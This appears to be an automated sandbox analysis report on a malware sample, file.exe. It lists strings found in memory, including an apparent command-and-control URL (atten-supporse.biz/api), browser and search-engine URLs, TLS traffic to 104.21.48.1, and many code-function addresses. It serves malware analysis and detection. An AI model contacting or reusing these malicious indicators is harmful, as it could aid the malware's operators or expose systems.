                Source: file.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182875665.000000000173E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205721535.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2268418527.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
                Source: file.exe, 00000000.00000003.2155923363.0000000005F91000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155687834.0000000005F90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api1
                Source: file.exe, 00000000.00000003.2268418527.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270544673.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiq
                Source: file.exe, 00000000.00000003.2268418527.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270318248.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271416754.00000000016D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apis
                Source: file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api://%ProgramFiles%
                Source: file.exe, 00000000.00000003.2206119101.0000000001746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205795166.0000000001743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/apiUU2
                Source: file.exe, 00000000.00000003.2227003028.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270461946.0000000001759000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2271651117.0000000001759000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.bz/
                Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: file.exe, 00000000.00000003.2157515360.0000000005F04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: file.exe, 00000000.00000003.2084953866.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085017975.0000000005F3A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084901511.0000000005F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: file.exe, 00000000.00000003.2157259258.0000000006228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49713 version: TLS 1.2

                System Summary

                barindex
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C761700_2_00C76170
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5E2A90_2_00C5E2A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7C6D70_2_00C7C6D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8E6900_2_00C8E690
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C587F00_2_00C587F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5A9600_2_00C5A960
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C66B7E0_2_00C66B7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C86C400_2_00C86C40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C60FD60_2_00C60FD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C86F900_2_00C86F90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C733A00_2_00C733A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C715F00_2_00C715F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C597B00_2_00C597B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C89B900_2_00C89B90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DCF00_2_00C8DCF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7BFD30_2_00C7BFD3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7BFDA0_2_00C7BFDA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D240DE0_2_00D240DE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB40D40_2_00DB40D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C880D90_2_00C880D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC20CF0_2_00DC20CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7C0C10_2_00D7C0C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE40D60_2_00CE40D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5A0F20_2_00D5A0F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D820F10_2_00D820F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB20F70_2_00DB20F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3A0FC0_2_00D3A0FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA00EB0_2_00DA00EB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6E0E10_2_00D6E0E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDE0910_2_00DDE091
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7409A0_2_00D7409A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5609A0_2_00D5609A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF209F0_2_00CF209F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9608A0_2_00D9608A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC20920_2_00CC2092
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7A0890_2_00D7A089
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA0BD0_2_00DCA0BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2A0B00_2_00D2A0B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAE0BE0_2_00DAE0BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB60B30_2_00DB60B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C780B00_2_00C780B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D500AC0_2_00D500AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8C0550_2_00D8C055
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D860410_2_00D86041
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB60510_2_00CB6051
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC80500_2_00CC8050
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF406F0_2_00CF406F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C75F7D0_2_00C75F7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5E06A0_2_00C5E06A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2606D0_2_00D2606D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCE01C0_2_00DCE01C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7E0110_2_00D7E011
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE20030_2_00CE2003
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3001E0_2_00D3001E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB80180_2_00CB8018
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBE00C0_2_00DBE00C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3400E0_2_00D3400E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCE03B0_2_00CCE03B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8A0300_2_00C8A030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6002D0_2_00D6002D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E201E60_2_00E201E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBA1C30_2_00CBA1C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2E1C20_2_00D2E1C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D661C30_2_00D661C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C801D00_2_00C801D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD01C50_2_00DD01C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D121C80_2_00D121C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D461CB0_2_00D461CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C581F00_2_00C581F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D401E80_2_00D401E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCE19D0_2_00CCE19D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB21920_2_00CB2192
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC01950_2_00CC0195
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D021B40_2_00D021B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC81B00_2_00DC81B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621A60_2_00D621A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAC1A90_2_00DAC1A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD21B30_2_00CD21B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8015C0_2_00D8015C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD015B0_2_00CD015B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D901410_2_00D90141
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D601730_2_00D60173
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A1690_2_00D0A169
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE81650_2_00DE8165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D541150_2_00D54115
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7A1000_2_00C7A100
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3211D0_2_00D3211D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5810E0_2_00D5810E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DFE1010_2_00DFE101
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9C13B0_2_00D9C13B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE01370_2_00DE0137
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE41230_2_00DE4123
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB82CB0_2_00CB82CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8E2C00_2_00C8E2C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4A2C20_2_00D4A2C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D662CE0_2_00D662CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF62E20_2_00CF62E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D762E40_2_00D762E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB02BB0_2_00DB02BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D942B00_2_00D942B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCC2A70_2_00CCC2A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D362B80_2_00D362B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE22A20_2_00DE22A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D682540_2_00D68254
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEE2460_2_00DEE246
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0424B0_2_00D0424B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAA2410_2_00DAA241
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDA2690_2_00DDA269
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C542700_2_00C54270
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C722700_2_00C72270
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB42710_2_00CB4271
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA22180_2_00DA2218
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C562000_2_00C56200
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D002030_2_00D00203
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDE2090_2_00DDE209
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5E2030_2_00D5E203
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D842290_2_00D84229
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D063D70_2_00D063D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA3CB0_2_00DBA3CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9C3F20_2_00D9C3F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D383E10_2_00D383E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8A3F00_2_00C8A3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDE38D0_2_00CDE38D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D023900_2_00D02390
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBA38E0_2_00CBA38E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9E3970_2_00D9E397
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC238C0_2_00DC238C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE63880_2_00DE6388
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD83920_2_00CD8392
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D783BD0_2_00D783BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D223BF0_2_00D223BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D163A60_2_00D163A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC03A10_2_00DC03A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAC35E0_2_00DAC35E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE03480_2_00CE0348
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D263410_2_00D26341
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFE3520_2_00CFE352
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1437F0_2_00E1437F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6C3600_2_00C6C360
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC430D0_2_00CC430D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4433A0_2_00D4433A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D304D70_2_00D304D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6E4D20_2_00D6E4D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC24D00_2_00CC24D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E4CF0_2_00D3E4CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D184FB0_2_00D184FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D544E40_2_00D544E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE24FC0_2_00CE24FC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D104E50_2_00D104E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB24F30_2_00CB24F3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD44E70_2_00DD44E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB84E60_2_00DB84E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD448C0_2_00CD448C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC648A0_2_00DC648A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2A4850_2_00D2A485
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CCA4910_2_00CCA491
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8C4850_2_00D8C485
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D484BC0_2_00D484BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0E4AC0_2_00D0E4AC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D724A80_2_00D724A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9045D0_2_00D9045D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEA47F0_2_00DEA47F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0A47A0_2_00D0A47A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8E4750_2_00D8E475
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCC4710_2_00DCC471
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC44730_2_00CC4473
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D564130_2_00D56413
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBC4160_2_00DBC416
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DB642C0_2_00DB642C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C864300_2_00C86430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDC5DD0_2_00DDC5DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFA5CE0_2_00CFA5CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE85CF0_2_00DE85CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDE5C70_2_00DDE5C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D465F70_2_00D465F7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D7C5E30_2_00D7C5E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D625840_2_00D62584
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE458A0_2_00DE458A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB85900_2_00CB8590
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4E5B80_2_00D4E5B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CF65BA0_2_00CF65BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD65430_2_00CD6543
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2E5660_2_00D2E566
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD25690_2_00DD2569
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEC56B0_2_00DEC56B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D8A56E0_2_00D8A56E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C665710_2_00C66571
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D9C5660_2_00D9C566
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D605160_2_00D60516
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB050E0_2_00CB050E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD85020_2_00CD8502
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA05050_2_00DA0505
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA853C0_2_00DA853C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CFE5260_2_00CFE526
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3C6D80_2_00D3C6D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5E6D90_2_00D5E6D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD86CB0_2_00DD86CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C766E70_2_00C766E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC06EF0_2_00CC06EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CD46EA0_2_00CD46EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CBA6E50_2_00CBA6E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0C6E80_2_00D0C6E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DAE69D0_2_00DAE69D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D806880_2_00D80688
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C566900_2_00C56690
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C866900_2_00C86690
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2868D0_2_00E2868D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CDE6BE0_2_00CDE6BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE26A30_2_00DE26A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D446560_2_00D44656
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D046410_2_00D04641
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D426430_2_00D42643
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1264C0_2_00D1264C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D2E6750_2_00D2E675
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C626700_2_00C62670
